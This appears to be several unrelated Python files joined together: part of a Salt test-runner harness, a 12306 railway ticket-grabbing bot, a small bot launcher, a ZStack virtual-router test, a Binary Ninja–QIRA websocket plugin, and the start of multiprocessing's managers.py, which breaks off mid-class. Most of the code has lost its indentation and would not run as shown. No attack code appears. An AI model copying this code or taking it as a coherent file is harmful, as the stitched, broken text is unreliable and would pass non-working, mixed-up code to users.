optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
proxy_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts, proxy_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
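        # After this loop each of the six configs carries, roughly, the following extra
        # YAML once transcribed (directory and port values are computed per test run):
        #
        #   engines:
        #     - salt_runtests: {}
        #   engines_dirs:
        #     - <ENGINES_DIR>
        #   log_handlers_dirs:
        #     - <LOG_HANDLERS_DIR>
        #   runtests_log_port: <SALT_LOG_PORT>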
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
salt.utils.yaml.safe_dump(computed_config, fp_, default_flow_style=False)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(sub_minion_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_master_computed_config, wfh, default_flow_style=False)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
)
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.minion_process.terminate()
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
self.master_process.terminate()
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
#salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50)
#self.sub_minion_process.join()
#salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50)
#self.minion_process.join()
#salt.utils.process.clean_proc(self.master_process, wait_for_kill=50)
#self.master_process.join()
#try:
# salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50)
# self.syndic_process.join()
#except AttributeError:
# pass
#try:
# salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50)
# self.smaster_process.join()
#except AttributeError:
# pass
self.log_server.server_close()
self.log_server.shutdown()
self._exit_mockbin()
self._exit_ssh()
self.log_server_process.join()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
'''
Minions setup routines
'''
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, 'sshd_process'):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
'''
Clean out the tmp files
'''
def remove_readonly(func, path, excinfo):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception:
log.exception('Failed to remove directory: %s', dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
                # Let's not have false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', tgt_type='list'
)
return [
k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
salt.utils.process.appendproctitle('WaitForMinionConnections')
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
try:
responses = self.client.cmd(
list(expected_connections), 'test.ping', tgt_type='list',
)
# we'll get this exception if the master process hasn't finished starting yet
except SaltClientError:
time.sleep(0.1)
now = datetime.now()
continue
for target in responses:
if target not in expected_connections:
                    # Some other minion we are not waiting for responded?
continue
expected_connections.remove(target)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns',
PNUM)
)
)
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
print(
'\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
tgt_type='list',
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], six.string_types):
                        # An error has occurred
print(
' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {LIGHT_RED}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionStates')
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionModules')
self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionGrains')
self.sync_minion_modules_('grains', targets, timeout=timeout)
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy, open_cdn_file
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
    Fast ticket submission channel
"""
def __init__(self):
self.cdn_list = open_cdn_file("filter_cdn_list")
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = TickerConfig.AUTO_CODE_TYPE
self.httpClint = HTTPClient(TickerConfig.IS_PROXY)
self.httpClint.cdn = self.cdn_list[random.randint(0, len(self.cdn_list) - 1)]
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cookies = ""
self.queryUrl = "leftTicket/queryO"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
self.flag = True
@staticmethod
def get_ticket_info():
"""
        Get configuration information and print it
:return:
"""
print(u"*" * 50)
print(f"检查当前版本为: {TickerConfig.RE_VERSION}")
version = sys.version.split(" ")[0]
print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version))
        if sys.version_info < (3, 6):
            raise Exception(u"Python 3.6 or newer is required")
print(u"12306刷票小助手,最后更新于2019.09.18,请勿作为商业用途,交流群号:"
u" 1群:286271084(已满)\n"
u" 2群:649992274(已满)\n"
u" 3群:632501142(已满)\n"
u" 4群: 606340519(已满)\n"
u" 5群: 948526733(已满)\n"
u" 7群: 660689659(已满)\n"
u" 8群: 620629239(已满)\n"
u" 6群: 608792930(未满)\n"
u" 9群: 693035807(未满)\n"
)
print(
f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \
f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
        Read the station table and map station display names to station codes
        :param from_station: departure station display name
        :param to_station: arrival station display name
        :return: (from_station_code, to_station_code)
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
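    # A sketch of the station_name.txt layout this parser assumes (the exact field
    # order is an assumption based on the split('|') indices used above):
    #
    #   var station_names ='@bjb|北京北|VAP|beijingbei|bjb|0@bjn|北京南|VNP|beijingnan|bjn|1...'
    #
    # After splitting on '@' and then '|', n_info[1] is the display name and
    # n_info[2] is the telecode, so station_name maps e.g. '北京南' -> 'VNP'.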
def call_login(self, auth=False):
"""
        Login callback method
:return:
"""
if auth:
return self.login.auth()
else:
            configCommon.checkSleepTime(self)  # if started during 12306's nightly downtime, sleep until it reopens
self.login.go_login()
def main(self):
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
while 1:
try:
num += 1
                now = datetime.datetime.now()  # thanks to a group member for the on-the-hour timing code
                configCommon.checkSleepTime(self)  # sleep during 12306's nightly downtime
                if TickerConfig.ORDER_MODEL == 1:
sleep_time_s = 0.5
sleep_time_t = 0.6
                    # Testing shows only microsecond-level error (e.g. 2019-01-02 22:30:00.004555), which should not matter;
                    # the pre-sale start is still affected by the previous refresh, and no better fix has been found yet
while not now.strftime("%H:%M:%S") == TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
if now.strftime("%H:%M:%S") > TickerConfig.OPEN_TIME:
break
time.sleep(0.0001)
else:
sleep_time_s = TickerConfig.MIN_TIME
sleep_time_t = TickerConfig.MAX_TIME
q = query(session=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
)
queryResult = q.sendQuery()
                # result from the left-ticket query API
if queryResult.get("status", False):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
secretList = queryResult.get("secretList", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
                        # fetch passenger contact info
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
                                             # waitlist orders need multiple seat types set
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList)
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
                            # Submit the order
                            # Orders come in two kinds: a normal grab order and a waitlist order
                            if secretStr:  # normal order
                                if TickerConfig.ORDER_TYPE == 1:  # fast one-click submission
a = autoSubmitOrderRequest(session=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
                                elif TickerConfig.ORDER_TYPE == 2:  # regular submission
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
                            elif secretList:  # waitlist order
c = chechFace(self, secretList, train_no)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else ""
print(f"正在第{num}次查询 随机停留时长:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000}ms")
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
                if "No JSON object could be decoded" in str(e):
print(u"12306接口无响应,正在重试")
else:
print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306接口无响应,正在重试 {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("长沙", "深圳")
|
main.py
|
import multiprocessing

def run_bot(name):
    __import__(name)  # module-level target: picklable under 'spawn', unlike the original lambda

if __name__ == '__main__':
    for bot in ('dankmemerSend', 'dankmemerReact'):
        multiprocessing.Process(target=run_bot, args=(bot,)).start()
|
test_start_vrs_simultaneously.py
|
'''
Test stop all vrs, then start them simultaneously
@author: Youyk
'''
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import threading
import time
import apibinding.inventory as inventory
import sys
import os
session_uuid = None
test_stub = test_lib.lib_get_test_stub()
exc_info = []
def start_vm(vm_uuid):
try:
vm_ops.start_vm(vm_uuid, session_uuid)
except:
exc_info.append(sys.exc_info())
def check_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
        raise info1, None, info2  # Python 2 three-argument raise: re-raise with the worker thread's traceback
def stop_vm(vm_uuid):
try:
vm_ops.stop_vm(vm_uuid, session_uuid)
except:
exc_info.append(sys.exc_info())
def test():
global session_uuid
session_uuid = acc_ops.login_as_admin()
l3_1_name = os.environ.get('l3VlanNetworkName1')
l3_2_name = os.environ.get('l3VlanDNATNetworkName')
l3_3_name = os.environ.get('l3VlanNetworkName3')
l3_4_name = os.environ.get('l3VlanNetworkName5')
l3_1 = test_lib.lib_get_l3_by_name(l3_1_name)
l3_2 = test_lib.lib_get_l3_by_name(l3_2_name)
l3_3 = test_lib.lib_get_l3_by_name(l3_3_name)
l3_4 = test_lib.lib_get_l3_by_name(l3_4_name)
    # Create 4 VRs (one per L3 network); reuse existing ones where possible.
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_1_name)
vm.destroy()
vr1 = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)[0]
else:
vr1 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_2_name)
vm.destroy()
vr2 = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)[0]
else:
vr2 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_3_name)
vm.destroy()
vr3 = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)[0]
else:
vr3 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_4_name)
vm.destroy()
vr4 = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)[0]
else:
vr4 = vrs[0]
vrs = [vr1, vr2, vr3, vr4]
for vr in vrs:
thread = threading.Thread(target=stop_vm, args=(vr.uuid,))
thread.start()
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
check_exception()
for vr in vrs:
thread = threading.Thread(target=start_vm, args=(vr.uuid,))
thread.start()
time.sleep(1)
acc_ops.logout(session_uuid)
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
check_exception()
test_util.test_pass('Test start VRs simultaneously success')
def error_cleanup():
global session_uuid
acc_ops.logout(session_uuid)
|
__init__.py
|
# -*- coding: utf-8 -*-
from binaryninja import *
from qirawebsocket import *
import threading
import time
import os
wsserver = None
msg_queue = []
bv = None
def plugin_start(view, address):
    # register_for_address callbacks receive (BinaryView, address)
    global bv
    bv = view
#sync_ninja_comments()
threading.Thread(target=start_server).start()
def handle_message_queue():
global msg_queue
while len(msg_queue) > 0:
dat = msg_queue[0].split(" ")
msg_queue = msg_queue[1:]
if dat[0] == "setaddress" and dat[1] != "undefined":
try:
a = int(str(dat[1][2:]),16)
set_ninja_address(a)
            except Exception:
print ("[QIRA Plugin] Error processing the address\n")
def start_server():
global wsserver
wsserver = SimpleWebSocketServer('', 3003, QiraServer)
if wsserver is not None:
wsserver.serveforever()
def ws_send(msg):
global wsserver
if (wsserver is not None) and (msg is not None):
for conn in wsserver.connections.itervalues():
conn.sendMessage(msg)
def set_ninja_address(addr):
global bv
bv.file.navigate(bv.file.view,addr)
def sync_ninja_comments(bv):
for function in bv.functions:
for addr, comment in function.comments.iteritems():
ws_send("setcmt %s %s" % (hex(int(addr)), comment))
class QiraServer(WebSocket):
def handleMessage(self):
        print(self.data)
msg_queue.append(self.data)
handle_message_queue()
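# Message protocol sketch, inferred from the handlers above (the exact QIRA wire
# format is an assumption, not documented here):
#   incoming:  "setaddress 0x400080"       -> navigate Binary Ninja to that address
#   outgoing:  "setcmt 0x400080 <comment>" -> push an instruction comment to QIRA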
PluginCommand.register_for_address("Qira-Ninja", "Since R2 is for madmen", plugin_start)
PluginCommand.register('Sync comments', 'Sync comments', sync_ninja_comments)
|
managers.py
|
#
# Module providing the `SyncManager` class for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import sys
import threading
import array
import queue
from time import time as _time
from traceback import format_exc
from . import connection
from . import context
from . import pool
from . import process
from . import reduction
from . import util
from . import get_context
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
    Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind == '#TRACEBACK':
assert type(result) is str
return RemoteError(result)
elif kind == '#UNSERIALIZABLE':
assert type(result) is str
return RemoteError('Unserializable message: %s\n' % result)
else:
return ValueError('Unrecognized message type')
class RemoteError(Exception):
def __str__(self):
